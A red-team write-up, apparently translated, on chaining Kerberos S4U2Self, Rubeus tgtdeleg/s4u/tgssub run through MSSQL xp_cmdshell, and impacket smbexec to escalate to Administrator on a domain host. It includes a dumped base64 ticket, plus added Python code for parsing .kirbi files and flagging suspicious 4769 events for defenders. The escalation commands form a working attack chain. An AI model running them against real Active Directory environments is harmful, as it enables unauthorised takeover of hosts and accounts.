Abusing S4U2Self for a privilege escalation attack chain
Preface: abusing S4U2Self for a privilege escalation attack chain
Reference article: https://www.cnblogs.com/websecyw/p/15437171.html
Reference article: https://www.cnblogs.com/zpchcbd/p/12963328.html
Reference article: https://blog.harmj0y.net/redteaming/rubeus-now-with-more-kekeo/
tgtdeleg
Reference article: https://www.cnblogs.com/websecyw/p/15437171.html
Reference article: https://blog.harmj0y.net/redteaming/rubeus-now-with-more-kekeo/
exec master..xp_cmdshell 'c:\programdata\rubeus.exe tgtdeleg /nowrap';
exec master..xp_cmdshell 'c:\programdata\Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /ticket:<Base64EncodedTicket>';
Use Rubeus's describe command to view the information in the current ticket, as shown in the figure below.
exec master..xp_cmdshell 'c:\programdata\rubeus.exe describe /ticket:doIFMDCCBSygAwIBBaEDAgEWooIENjCCBDJhggQuMIIEKqADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0GwtaUENIQ0JELkNPTaOCA/AwggPsoAMCARKhAwIBAqKCA94EggPapAyA2rjqbvbRU/AoT1AAdlMQEMlhiQ6Mw83b6noK3hE9fPVvR6MY87pt37DnMIhVyMSqMkUvughoNh1NDl5d3ZfzqqesMpSc7iOXpbliHlaP23g9SyekZ0xG6MCDpfGVMBba0TwuzGyy8KLbQNfFd744icFW9Y7jWVDtpyhx6DcY31yqafVyOE208GfKGry7x7IY1P83j7Eo7jzoVX0FuH+qjUix/3kRE2Oj8zJAIFqdKXYGCCQW+nIKigX6J7tR6er5PPmmsfcSGPqnp2HEPph2Lo/6KZD4Nm/sksxhLRJ4DBp1P75aADWiHIV7Cl6an5u+754PBeAejA2oVKSeofkMdU/wOzU47ZTjwmR6YKk83MMod3BlV9DXDh3mSx/Gc53co3TLb2BaFA1aW8xxRUO8KULxsXrkfFDeGjUroCGlqSL3WNZCmLHnBBt9GSU53rY82c11iGDH8XSsF8/3QaHXPtrHnxCMkpNWyoPWCiLD+BN78hQ8HCymqvvLfSHfmA+cc88g1eerinuwp5a7YmIjoAA6L4tWKvE7yni6qSlcudvL8J9xnBRYuvJIJLdLFrn4ddrQZtzSYVMjQIthPFkzvTRRiV1iikiWVyTW59hjWagaAMttcvpobIpB8LYOhfZBCcRKhz7ebERwT96BM3tlOMA8tNo31nd7D0Omu2joFU1hLEcfCzLHpYoHOTvMznbDb0g03wAaMe9U/PaUsYn76MoFND+5ACzyQXO4yeq2RvqAxQZil1pdN1YZvaD8lgwYuDZeL3zlsfJRnl0KARAeOXhXQW1d03v1m4g34CHzua2fOzSsvEIuzzAOLlhb9qqQ25ebIYB/9/EduGTnbL4Ra4jhvlv70178FVWnXWZz5Bj3yB7iQsp0Ldt0Kp91piWzTKkE/j2bws071BuOb5ZSzNOO3qMVoA8kzPVIJ48U8QTZ+hAFu2dqLRpyc7tfVo4lQEMt2hrlwPVrDA/LUQN1Sg8tO/edrToWwKgeMO4G1A/fY2nFKZDPGvN9yPmOH+arARxtD6/ePadrb7mza3YQzfnZc7j5UHXHIp+IOlgVqfb6HZ3GEEvGsGK9mm49Fwf8+lqhJjce3rnn54NgLSkG244Xd4PZ9erTy02AWNPQZGwa337uJ0cG/idZM81Fp5WS0UeAg39srb5o4pnWZLqr9aOcpxpo0OATo5MVQT7vh2bjqHBlt7pOkuZg/E3ZDiH8U1RRL/UesWIOiBAV4ROAnxuV1udx0yvK8ksW3XX1Dcl9fag4lob5aI3vc87wP51MeYTZSVNbJ9f5AYLzoAU29dvMucYRNmWjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCAmBUH8pCQoQEcpStyXpBYrExCZAKhUXMTpwBihQTvpyaENGwtaUENIQ0JELkNPTaIXMBWgAwIBAaEOMAwbCldJTi1NU1NRTCSjBwMFAGChAAClERgPMjAyMzEyMjQwNzU0MjhaphEYDzIwMjMxMjI0MTc1NDI4WqcRGA8yMDIzMTIzMTA3NTQyOFqoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC1pQQ0hDQkQuQ09N';
Knowledge point: the SPN is not part of the protected portion of the ticket. After S4U2Proxy requests a TGS for the corresponding service from the KDC, the server name in the returned TGS is encrypted but the service name is not, so if we modify the TGS's service name in memory we can gain access to a different service on the same host.
It can be changed simply: Rubeus provides the tgssub command to do this.
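To make the describe step and the knowledge point above concrete, here is an added example (written for this page, not code from the original post or from Rubeus): a minimal Python "describe" for a .kirbi file, which is a DER-encoded KRB-CRED (RFC 4120, section 5.8.1). It shows where the fields live: the Ticket's realm and sname (the SPN) sit in the clear next to the sealed enc-part, and because dump tools write the KRB-CRED's own enc-part with etype 0, the client name, session key and flags are readable without any key. SAMPLE_KIRBI is constructed here with made-up key and cipher bytes; only the realm and host name are taken from the post.

```python
import base64
import sys

# Added example (not from the post or from Rubeus): a minimal "describe" for a .kirbi, i.e. a
# DER-encoded KRB-CRED (RFC 4120 5.8.1). SAMPLE_KIRBI below is constructed for illustration.

SEQ, INT, BITS, OCTETS, GSTR = 0x30, 0x02, 0x03, 0x04, 0x1B

def der(tag, body):  # one DER TLV; long length form from 128 bytes on
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def ctx(n, body):  # context-specific constructed tag [n]
    return der(0xA0 | n, body)

def kint(v):  # Int32/UInt32, non-negative only
    return der(INT, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big"))

def principal(name_type, parts):  # PrincipalName: [0] name-type, [1] SEQUENCE OF KerberosString
    return der(SEQ, ctx(0, kint(name_type)) + ctx(1, der(SEQ, b"".join(der(GSTR, p.encode()) for p in parts))))

def ticket_flags(*bits):  # 32-bit BIT STRING; bit numbers as in RFC 4120 (1 = forwardable, 8 = renewable ...)
    word = sum(0x80000000 >> b for b in bits)
    return der(BITS, b"\x00" + word.to_bytes(4, "big"))

def build_kirbi(realm, sname, cname, session_key, cipher, flag_bits):
    """KRB-CRED as dump tools write it: one Ticket plus an EncKrbCredPart with etype 0 (not encrypted)."""
    r = der(GSTR, realm.encode())
    ticket = der(0x61, der(SEQ,                                  # [APPLICATION 1] Ticket
        ctx(0, kint(5)) + ctx(1, r)
        + ctx(2, principal(2, sname))                            # sname sits OUTSIDE the sealed enc-part
        + ctx(3, der(SEQ, ctx(0, kint(18)) + ctx(1, kint(2)) + ctx(2, der(OCTETS, cipher))))))
    info = der(SEQ,                                              # KrbCredInfo
        ctx(0, der(SEQ, ctx(0, kint(18)) + ctx(1, der(OCTETS, session_key))))
        + ctx(1, r) + ctx(2, principal(1, cname)) + ctx(3, ticket_flags(*flag_bits))
        + ctx(8, r) + ctx(9, principal(2, sname)))
    enc_cred_part = der(0x7D, der(SEQ, ctx(0, der(SEQ, info))))  # [APPLICATION 29] EncKrbCredPart
    return der(0x76, der(SEQ,                                    # [APPLICATION 22] KRB-CRED
        ctx(0, kint(5)) + ctx(1, kint(22)) + ctx(2, der(SEQ, ticket))
        + ctx(3, der(SEQ, ctx(0, kint(0)) + ctx(2, der(OCTETS, enc_cred_part))))))

def decode(buf, pos=0):  # -> ((tag, children | bytes), end)
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    end = pos + length
    if not tag & 0x20:
        return (tag, buf[pos:end]), end
    kids = []
    while pos < end:
        node, pos = decode(buf, pos)
        kids.append(node)
    return (tag, kids), end

def field(seq_node, n):  # inner node of context tag [n] in a SEQUENCE node, None if absent
    return next((inner[0] for tag, inner in seq_node[1] if tag == 0xA0 | n), None)

def name_of(principal_node):
    return "/".join(v.decode() for _, v in field(principal_node, 1)[1])

FLAG_NAMES = {1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy", 5: "may_postdate",
              6: "postdated", 7: "invalid", 8: "renewable", 9: "initial", 10: "pre_authent",
              11: "hw_authent", 12: "transited_policy_checked", 13: "ok_as_delegate"}

def describe_kirbi(blob):
    """What a responder wants from a found ticket: whose it is, for which service, key type, flags."""
    (tag, kids), _ = decode(blob)
    if tag != 0x76:
        raise ValueError("not a KRB-CRED (.kirbi)")
    cred = kids[0]
    ticket = field(cred, 2)[1][0][1][0]                    # tickets[0] -> the Ticket's inner SEQUENCE
    out = {"realm": field(ticket, 1)[1].decode(),
           "service": name_of(field(ticket, 2)),
           "ticket_etype": int.from_bytes(field(field(ticket, 3), 0)[1], "big")}
    enc = field(cred, 3)
    if int.from_bytes(field(enc, 0)[1], "big") != 0:     # really encrypted: no client info without a key
        out["client"] = None
        return out
    (_, parts), _ = decode(field(enc, 2)[1])              # etype 0: cipher bytes are a plain EncKrbCredPart
    info = field(parts[0], 0)[1][0]                       # ticket-info[0]
    key = field(info, 0)
    word = int.from_bytes(field(info, 3)[1][1:5], "big")  # skip the BIT STRING's unused-bits byte
    out["client"] = name_of(field(info, 2)) + "@" + field(info, 1)[1].decode()
    out["key_etype"] = int.from_bytes(field(key, 0)[1], "big")
    out["session_key_hex"] = field(key, 1)[1].hex()
    out["flags"] = [name for bit, name in FLAG_NAMES.items() if word & (0x80000000 >> bit)]
    return out

# Constructed sample shaped like the TGT the tgtdeleg step returns for WIN-MSSQL$ (all values made up).
SAMPLE_KIRBI = build_kirbi("ZPCHCBD.COM", ["krbtgt", "ZPCHCBD.COM"], ["WIN-MSSQL$"],
                           session_key=bytes(range(32)), cipher=bytes(range(64)) * 4,
                           flag_bits=(1, 8, 9, 10))       # forwardable, renewable, initial, pre_authent

if __name__ == "__main__":  # usage: python3 describe_kirbi.py [<base64 of a .kirbi>]
    blob = base64.b64decode(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_KIRBI
    for k, v in describe_kirbi(blob).items():
        print(f"{k:>16}: {v}")
```

Run it without arguments to see the constructed sample, or pass the base64 blob of a .kirbi on the command line. Two points matter for defenders. First, the sname is the only thing that names the service, and it is outside enc-part, which is why nothing in the sealed part contradicts a re-labelled ticket; the service key is what matters, and every SPN registered on one computer account (MSSQLSvc, cifs, host, ...) is sealed with the same key, so giving sensitive services their own service accounts removes that interchangeability. Second, a .kirbi found on disk or in a capture leaks its client name, session key and flags without any cracking, so treat such files as credential material during incident response.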
exec master..xp_cmdshell 'c:\programdata\Rubeus.exe tgssub /nowrap /altservice:cifs/WIN-MSSQL.zpchcbd.com /ticket:<Base64EncodedTicket>';
Base64-decode the Base64EncodedTicket obtained above:
cat base64.kirbi | base64 -d > ticket.kirbi
Use impacket to convert it into a ticket usable on Linux:
python3 ticketConverter.py ticket.kirbi ticket.ccache
Import the ticket and then connect with psexec:
export KRB5CCNAME=ticket.ccache
python3 smbexec.py WIN-MSSQL.zpchcbd.com -no-pass -k -debug -dc-ip 192.168.75.202
Note: if you are not inside the domain, remember to configure the hosts file first, as shown in the figure below.
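For the detection side of the chain above, here is an added example (not from the original post) of a triage heuristic over Windows Security event 4769 ("A Kerberos service ticket was requested"). It assumes the DC records the S4U2Self request with ServiceName set to the requesting computer account, TargetUserName set to the impersonated user, and IpAddress set to that computer's own address, and that you can map computer accounts to their expected addresses from your own inventory (HOST_ADDRESSES is a constructed stand-in). The event lines are constructed; their field names follow the 4769 EventData names.

```python
# Added example (not from the original post): flag 4769 events in which a computer account
# obtained a service ticket to *itself* for a different principal, sent from its own address,
# which is what the S4U2Self step of the chain looks like at the domain controller.
from typing import Dict, List

# Assumption: expected address per computer account, e.g. from DHCP/DNS exports (constructed values).
HOST_ADDRESSES = {"WIN-MSSQL$": "192.168.75.201", "DC01$": "192.168.75.202"}
# Accounts whose impersonation should page someone (constructed list).
PRIVILEGED_USERS = {"administrator"}

# Constructed export: one event per line, EventData fields as key=value separated by "|".
SAMPLE_EVENTS = """\
EventID=4769|TargetUserName=Administrator@ZPCHCBD.COM|ServiceName=WIN-MSSQL$|IpAddress=::ffff:192.168.75.201|Status=0x0
EventID=4769|TargetUserName=alice@ZPCHCBD.COM|ServiceName=WIN-MSSQL$|IpAddress=::ffff:192.168.75.50|Status=0x0
EventID=4769|TargetUserName=WIN-MSSQL$@ZPCHCBD.COM|ServiceName=krbtgt|IpAddress=::ffff:192.168.75.201|Status=0x0
EventID=4769|TargetUserName=bob@ZPCHCBD.COM|ServiceName=WIN-MSSQL$|IpAddress=::ffff:192.168.75.201|Status=0x0
EventID=4769|TargetUserName=Administrator@ZPCHCBD.COM|ServiceName=WIN-MSSQL$|IpAddress=::ffff:192.168.75.201|Status=0x1b
EventID=4768|TargetUserName=WIN-MSSQL$|ServiceName=krbtgt|IpAddress=::ffff:192.168.75.201|Status=0x0
"""

def parse_event(line: str) -> Dict[str, str]:
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))

def normalize_ip(addr: str) -> str:
    return addr[7:] if addr.startswith("::ffff:") else addr   # 4769 logs IPv4 as IPv4-mapped IPv6

def self_service_ticket(ev: Dict[str, str]) -> bool:
    """True when a computer account got a ticket to itself for another principal from its own address."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":   # only successful TGS requests
        return False
    service = ev.get("ServiceName", "")
    user = ev.get("TargetUserName", "").split("@")[0]
    if not service.endswith("$") or user.lower() == service.lower():  # service must be a computer account
        return False
    return normalize_ip(ev.get("IpAddress", "")) == HOST_ADDRESSES.get(service)

def find_s4u2self_candidates(export: str) -> List[Dict[str, str]]:
    hits = []
    for line in export.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if self_service_ticket(ev):
            user = ev["TargetUserName"].split("@")[0]
            hits.append({"user": user, "service": ev["ServiceName"], "ip": normalize_ip(ev["IpAddress"]),
                         "severity": "high" if user.lower() in PRIVILEGED_USERS else "medium"})
    return hits

if __name__ == "__main__":
    for hit in find_s4u2self_candidates(SAMPLE_EVENTS):
        print(hit)
```

On the sample export this reports the Administrator request as high and bob's as medium, and ignores the request from a different address, the failed request, and the AS-REQ. The heuristic is deliberately loose: a user logged on interactively to the host who opens a local share by FQDN produces the same 4769, so the medium hits need a baseline or a correlation with 4624 logon events on that host (an impersonated user typically has no logon session there), while services legitimately configured for protocol transition should be allow-listed by account.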
Resource-based delegation
Reference article: https://www.cnblogs.com/zpchcbd/p/12963328.html
The resource-based delegation route is used in the same way as a normal resource-based constrained delegation attack, except that the target is the host itself; see the article above, which already documents it.